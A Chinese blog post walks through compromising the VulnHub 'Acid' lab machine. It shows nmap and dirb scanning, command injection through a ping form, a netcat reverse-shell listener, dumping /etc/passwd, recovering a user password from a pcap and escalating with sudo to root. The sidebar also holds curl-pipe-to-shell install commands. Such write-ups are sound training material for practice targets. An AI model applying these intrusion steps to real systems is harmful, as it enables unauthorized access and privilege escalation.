VulnHub打靶の-Acid

最新推荐文章于 2024-03-08 12:53:00 发布
最新推荐文章于 2024-03-08 12:53:00 发布
阅读量1.1k 收藏
点赞数
分类专栏: 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39194641/article/details/83016206
版权

靶机地址:https://download.vulnhub.com/acid/Acid.rar

首先nmap -sP 或netdiscover -r来找靶机的IP,此为192.168.1.171

nmap -sV -p- 192.168.1.171扫描靶机的全部端口的服务版本:

root@Kali-X86:~# nmap -sV -p- 192.168.1.171
Starting Nmap 7.70 ( https://nmap.org ) at 2018-10-11 17:42 CST
Nmap scan report for 192.168.1.171
Host is up (0.0050s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
可见靶机开着提供http服务的33447端口,访问一下发现主页和主页源码没有任何线索:

爆破一下目录:dirb http://192.168.1.171:33447没什么收获,突然发现标题是/Challenge,访问一下:

继续爆破一下当前目录:

发现/cake.php,hack.php子目录,标题是/Magic_Box,继续访问,提示没权限:

继续爆破目录,发现command.php,有ping命令,尝试用';'成功绕过:

接下来反弹shell:

bash反弹失败,php反弹成功,获得一个web权限的shell:

root@Kali-X86:~# nc -lvp 4444
listening on [any] 4444 ...
192.168.1.171: inverse host lookup failed: Unknown host
connect to [192.168.1.169] from (UNKNOWN) [192.168.1.171] 46184
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

查看/etc/passwd寻找uid,gid大于1000的用户:

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:104:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:105:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:106:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:107:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:110::/home/syslog:/bin/false
messagebus:x:105:112::/var/run/dbus:/bin/false
uuidd:x:106:113::/run/uuidd:/bin/false
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/bin/false
ntp:x:108:117::/home/ntp:/bin/false
whoopsie:x:109:118::/nonexistent:/bin/false
acid:x:1000:1000:acid,,,:/home/acid:/bin/bash
mysql:x:111:126:MySQL Server,,,:/nonexistent:/bin/false
saman:x:1001:1001:,,,:/home/saman:/bin/bash
find / -user acid 2>/dev/null查找acid用户的文件:

发现hint.pcap网络流量包文件,打开分析流量:

 可得用户saman的密码为1337hax0r

sudo -i得到root权限:

root@acid:~# cat flag.txt
cat flag.txt


Dear Hax0r,


You have successfully completed the challenge.

I  hope you like it.


FLAG NAME: "Acid@Makke@Hax0r"


Kind & Best Regards

-ACID
facebook: https://facebook.com/m.avinash143

此靶机完成。

壊壊的诱惑你
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulawdhub:该项目是利用docker技术创建的有漏洞的cms环境集合,可以进行练习
05-17
简介 该项目可以利用docker和docker-compose轻松的搭建漏洞环境 docker安装 ubuntu16.06 # 安装pip curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装最新版docker curl -s https://get.docker.com/ | sh # 启动docker服务 service docker start # 安装compose pip install docker-compose macOS /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" # 安装docker brew cask install docker
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 (附靶机搭建教程)
qq_51577576的博客
03-14 6452
[ vulnhub靶机通关篇 ] 渗透测试综合靶场 DC-1 通关详解 从信息收集到拿到低权限,最后提权获取最高权限,详细解读
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 912
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 6644
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
vulnhub靶场-Nagini
qq_42947816的博客
11-01 1751
Nagini 是 HarryPotter VM 系列的第二个 VM,您需要在其中找到隐藏在机器内的 3 个魂器(哈利波特系列的 3 个 VM 中总共隐藏了 8 个魂器)并最终击败 Voldemort
Vulnhub | 实战靶场渗透测试 - PRIME: 1
尼泊罗河伯的博客
06-01 1312
这台机器是为那些试图准备 OSCP 或 OSCP 考试的人设计的。这是素数系列的第一级。在每个阶段都会提供一些帮助。机器很长,因为 OSCP 和黑客的机器是设计的。因此,您有一个获取根标志和用户标志的目标。如果卡在某个点上,则会在枚举级别上提供一些帮助。
打靶练习vulnhub: my-cmsms
最新发布
04-10
打靶练习vulnhub: my-cmsms
打靶练习vulnhub:Insanity-Hosting
03-19
打靶练习vulnhub:Insanity-Hosting
地空战-打靶游戏-易语言
06-13
地空战-打靶游戏
一起打靶-Breach-2-final2.1.xss上线
09-28
一起打靶-Breach-2-final2.1.xss上线
打靶游戏-creator.zip源码cocos creator项目源码下载
03-17
打靶游戏-creator.zip源码cocos creator项目源码下载打靶游戏-creator.zip源码cocos creator项目源码下载 1.适合个人学习技术做项目参考 2.开发脚本为javsScropt或者typeScript 3.适合小公司开发游戏项目参考
Vulnhub靶机渗透学习——DC-7
qq_45612828的博客
10-22 126
白盒源码审计泄露Drush 重置管理员密码Drupal 8 后台-getshell 方式通过由 root 用户定时执行脚本提权。
Vulnhub-DC-1实战靶场
ierciyuan的博客
10-12 2319
本次靶场实战涉及信息收集、漏洞查找与利用、getshell、数据库渗透、密码破解、linux提权,并找到官方设计的5个flag。
Vulnhub靶机渗透之环境搭建及JIS-CTF入门
qq_61702710的博客
07-15 2072
写道这里,这篇文章讲解完毕,后续会更深入的分享。netdiscover 用于发现目标ipnmap进行端口扫描dirb进行目录扫描敏感文件获取及分析php木马生成和蚁剑工具ssh远程连接sudo提权数据库脱裤相关内容整理于网上,侵权删。
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 5284
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
VulnHub靶场】——EMPIRE: BREAKOUT
Demo不是emo的博客
09-24 3325
​ 今天写一份EMPIRE: BREAKOUT靶场教程,靶场环境来源于VulnHub,该网站有很多虚拟机靶场,靶场入口在这,推荐大家使用,大家进去直接搜索EMPIRE: BREAKOUT就能下载今天的靶场了,也可以找我拿,话不多说进入正题
Vulnhub DC9|下载|渗透笔记|knockd敲门服务|文件包含漏洞
qq_60115503的博客
04-19 1272
VulnhubDC9下载靶场提取码:lyq1 将下载好的靶场导入VMware,虚拟机设置网络模式为nat模式,即可开启渗透 主机发现 首先查看自己属于的网段ip 进行nmap主机发现 nmap -sP -sn 192.168.106.1/24 -sP进行主机发现发送ping包 -sn进行NULL扫描 探测到ip地址为192.168.106.129 所以我们进一步了解该靶场的服务 使用nmap -sV -A -T4 192.168.106......
VulnHubAcid靶场复盘
redwand的博客
03-15 5699
本靶机要点,一、CTF常见的目录提示方式。二、提权过程中用户文件遍历。三、sudo配置不当提权。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5295
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
蒙特卡洛打靶matlab
05-12
蒙特卡洛打靶是一种常用的数值模拟方法,可以用来估计某个过程的概率分布或期望值。在打靶问题中,我们需要估计一个枪手打中靶心的概率。 下面是使用 Matlab 实现蒙特卡洛打靶的代码示例: ```matlab % 定义打靶次数 N = 10000; % 定义靶心坐标和半径 x0 = 0; y0 = 0; R = 1; % 生成随机打靶点 x = rand(N, 1) * 2 - 1; y = rand(N, 1) * 2 - 1; % 判断每个打靶点是否在靶内 hit = (x - x0).^2 + (y - y0).^2 <= R^2; % 计算命中率 p = sum(hit) / N; % 显示结果 disp(['命中率为:', num2str(p)]); ``` 运行上述代码,可以得到指定次数的随机打靶结果,并计算出打中靶心的概率。通过增加打靶次数 N 的值,可以提高结果的精度。 需要注意的是,蒙特卡洛打靶方法本身并没有固定的误差范围,因此需要根据具体情况选择合适的打靶次数 N 来获得足够精确的结果。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值